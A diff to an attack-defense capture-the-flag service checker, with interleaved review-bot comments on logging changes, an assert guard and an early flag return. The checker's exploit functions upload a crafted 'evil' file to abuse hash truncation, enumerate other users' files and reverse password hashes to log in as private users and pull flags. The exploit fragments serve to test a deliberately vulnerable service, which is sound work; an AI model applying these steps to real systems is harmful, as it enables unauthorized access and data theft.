Diffstat (limited to 'checker/src')
| -rw-r--r-- | checker/src/checker.py | 22 |
1 files changed, 13 insertions, 9 deletions
diff --git a/checker/src/checker.py b/checker/src/checker.py index 3f12417..3c4fc9f 100644 --- a/checker/src/checker.py +++ b/checker/src/checker.py @@ -109,6 +109,10 @@ class Session: await self.writer.drain() def write(self, data: bytes) -> None: + if len(data) > 100: + self.logger.debug(f"Sending {data[:100]!r}.."); + else: + self.logger.debug(f"Sending {data!r}"); self.writer.write(data) async def prepare(self) -> None: @@ -370,7 +374,7 @@ async def getdb(db: ChainDB, key: str) -> tuple[Any, ...]: async def do_auth( session: Session, authstr: bytes, check: bool = True, newuser: bool = True ) -> Optional[bytes]: - session.logger.debug(f"Logging in with {authstr!r}") + # Login with authstr session.write(b"auth\n") session.write(authstr + b"\n") await session.drain() @@ -1027,14 +1031,13 @@ async def exploit_prefix_truncation( modelname = fakeid() searcher = await di.get(FlagSearcher) - session = await di.get(Session) - session.logger.debug("Uploading evil file for hash truncation") - + # Generate exploit payload using attack_info assert task.attack_info is not None target_prefix = task.attack_info.split()[1][:-2].encode() + evil_file = exploit_0_file_prefix + target_prefix + exploit_0_file_suffix # Upload evil file - evil_file = exploit_0_file_prefix + target_prefix + exploit_0_file_suffix + session = await di.get(Session) await do_upload(session, modelname, stlfile=evil_file, check=True) await do_search(session, modelname, download=False, check=True) @@ -1052,7 +1055,6 @@ async def exploit_prefix_truncation( # Use it to enumerate other files and grab contents flag = None for fhash in filelist: - session.logger.debug(f"Retrieving file {fhash}") session.write(fhash + b"\n") session.write(b"n\n") await session.drain() 
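Review bot: The debug line added to `Session.write` records every outgoing payload, and `do_auth` sends `authstr` through that same method, so removing the explicit "Logging in with" message in the next hunk does not keep auth strings out of the debug log. If those logs are retained or shared, a short comment on `write` saying that payloads (credentials included) are logged, truncated to 100 bytes, would make that explicit. Both new `logger.debug(...)` calls end in a stray semicolon, and the f-strings are formatted even when debug logging is disabled. The branch can collapse to `self.logger.debug("Sending %r%s", data[:100], ".." if len(data) > 100 else "")`. The `Session` class starts outside the hunk.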
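Review bot: In the `exploit_prefix_truncation` hunk, the new comment `# Generate exploit payload using attack_info` does not say what shape `task.attack_info` is expected to have, while the `split()[1][:-2]` beneath it depends on that shape entirely. The guard in front of it is only an `assert`, which is stripped under `python -O`, and an attack_info with fewer than two fields would surface as a bare `IndexError`. I would extend the comment with the expected format and replace the assert with an explicit check that raises the checker's own error type for malformed task data. The function starts and continues outside the hunk.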
@@ -1064,7 +1066,6 @@ async def exploit_prefix_truncation( b"==================", ctx="getting file info (1)" ) resp += await session.readuntil(b"[q to quit]: ", ctx="getting file info (2)") - session.logger.critical(resp) if flag := searcher.search_flag(resp): break @@ -1101,17 +1102,20 @@ async def exploit_hash_overflow( # Get private user hashes via 'list' resp = await do_list(session, check=True) - session.logger.critical(resp) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] await session.exit() + # Check if there is a flag in the response already + # (shouldn't be, enochecker_test will throw an error if this succeeds) + if flag := searcher.search_flag(resp): + return flag + # Login as each private user for userhash in users: if not userhash.startswith(target_prefix): continue # Find preimage of user hash - session.logger.debug(f"Logging in as user with id {userhash!r}") authstr = reverse_hash(userhash.decode()) # Authenticate and check if the user is new |
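Review bot: The early `return flag` added after `await session.exit()` in `exploit_hash_overflow` lets the function succeed without reaching the preimage login, and nothing is logged when that branch is taken. The comment says this should not happen and that enochecker_test will flag it, but outside that test run the only trace is the returned flag. Since this commit also drops the `session.logger.critical(resp)` dump, one line before the return, for example `session.logger.warning("flag already present in list output")`, would keep an unintended leak in the listing visible to whoever maintains the service. The function starts and continues outside the hunk.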
